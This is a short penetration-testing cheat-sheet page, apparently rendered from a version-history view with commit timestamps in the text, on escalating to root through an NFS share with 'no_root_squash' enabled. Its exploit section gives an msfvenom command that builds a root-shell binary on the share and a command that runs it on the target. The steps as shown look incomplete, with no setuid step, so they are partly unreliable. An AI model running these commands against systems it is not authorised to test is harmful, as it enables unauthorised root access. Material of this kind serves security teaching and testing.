2022-11-11 01:15:07 +01:00
|
|
|
# NFS NO ROOT SQUASH
|
|
|
|
|
|
2023-08-18 23:05:23 +02:00
|
|
|
Mount NFS locally and gain root through activated `no_root_squash`.
|
2022-11-11 01:15:07 +01:00
|
|
|
|
2023-08-18 23:05:23 +02:00
|
|
|
When "no_root_squash" is enabled on an NFS share, it means that the "root" user
|
|
|
|
|
from the client system retains its full privileges when interacting with files
|
|
|
|
|
on the NFS share. In other words, any actions performed by the "root" user on
|
|
|
|
|
the client system are replicated with full permissions on the NFS server. This
|
|
|
|
|
can potentially lead to a security vulnerability, especially if the client
|
|
|
|
|
system is compromised or maliciously manipulated.
|
|
|
|
|
|
|
|
|
|
## Exploit
|
|
|
|
|
|
|
|
|
|
### Craft a Shell
|
|
|
|
|
|
|
|
|
|
Craft a shell and execute it on the NFS share which has `no_root_squash`
|
|
|
|
|
enabled to gain root privilege.
|
2022-11-11 01:15:07 +01:00
|
|
|
|
|
|
|
|
```sh
|
|
|
|
|
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
|
|
|
|
|
```
|
2023-08-18 23:05:23 +02:00
|
|
|
|
|
|
|
|
After the shell has been created on or copied to the share, execute it on the
|
|
|
|
|
target share
|
|
|
|
|
|
2022-11-11 01:15:07 +01:00
|
|
|
```sh
|
|
|
|
|
./shell.elf -p
|
|
|
|
|
```
|
